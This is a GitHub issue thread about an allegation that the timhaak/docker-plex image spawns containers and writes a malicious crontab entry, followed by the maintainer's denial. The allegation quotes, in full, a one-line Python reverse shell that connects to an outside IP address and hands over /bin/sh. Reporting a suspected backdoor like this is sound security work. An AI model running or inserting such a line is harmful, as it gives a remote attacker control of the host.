### ISSUE TITLE
Warning about connections to remote IP

### ISSUE THREAD

**Issue by riker09** [timhaak/docker-plex#92]
There is a comment on [hub.docker.com](https://hub.docker.com/r/timhaak/plex/) regarding not to use this image as it would open some kind of connection to a (chinese?) IP address. Here's the original text written by user `puri` five days ago:

> TAKE CARE - This image creates open sockets connected to a chines ip server. Further its creating a subprocess with your hosts shell /bin/bash !!!
> While running this image as a container it will create additional containers of the same image which injects following to the hosts crontab.
> 
> `* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("211.149.215.17",1445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`

I did a quick review of all relevant files, but I couldn't find anything suspicious. The owner should take the comment down or respond to it on hub.docker.com, if it contains false accusations.

**Comment by timhaak** [comment]
Hi

Not sure what the person was doing though have had it where people put comments about other plex images.

I've responded on docker hub. Though I can't take the comments down on docker hub.

Bellow is my response. 

Thanks for letting us know.

@puri Not sure what your on about. This is build by docker from this github repo https://github.com/timhaak/docker-plex.

It's using the official ubuntu:16.04 image and it's getting the plex build from plex it's self.

So either plex is adding that or more likely you were looking at some other docker image and not this one.

Having said that I see that plex is not finally doing one them selves. So that may be the best way forward.
